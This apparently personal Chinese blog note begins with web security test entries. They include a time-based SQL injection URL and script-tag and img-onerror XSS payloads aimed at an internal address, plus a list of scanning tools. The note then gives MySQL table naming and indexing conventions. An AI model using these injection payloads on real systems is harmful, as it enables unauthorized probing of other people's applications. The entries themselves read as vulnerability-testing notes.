安全

1. http://10.200.9.190/****?appid=sports' AND SLEEP(5) AND 'GpQK'='GpQK

坑啊,原生态拼装写法。。。。。

2.http://10.200.9.190/****?appid=sports'<script> alert(444);</script>

hackbar

Safe3WVS工具比较好使

BurpSuite

https://legacy.gitbook.com/book/t0data/burpsuite/details

name=<img src=1 οnerrοr=alert(1)>

数据库规范


1、创建新表时需要主键, 主键名为 id 自增 且为 int 或 bigint 类型,新表id加主键时不能再为id加唯一索引


2、新表必须有注释,新表必须加除主键外的其他索引


3、新表前四列依顺序必须有id、create_time、update_time、description这四个默认列(时间类型datetime时间长度6,时间小数点0)


4、表fr_开头的列需排在非fr_开头的后面


3、数据表字段需要有注释, 且需要默认值,影响性能的字段默认值为空字符串


4、普通索引前缀为 idx_列名,唯一索引前缀uk_列名


5、外键所链接的表如果是字典表外键名前缀需fr_开头,非字典表需fr_tb_开头


6、 字段名不能为 MySQL 关键字


7、编码类型: utf8 或 utf8mb4

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值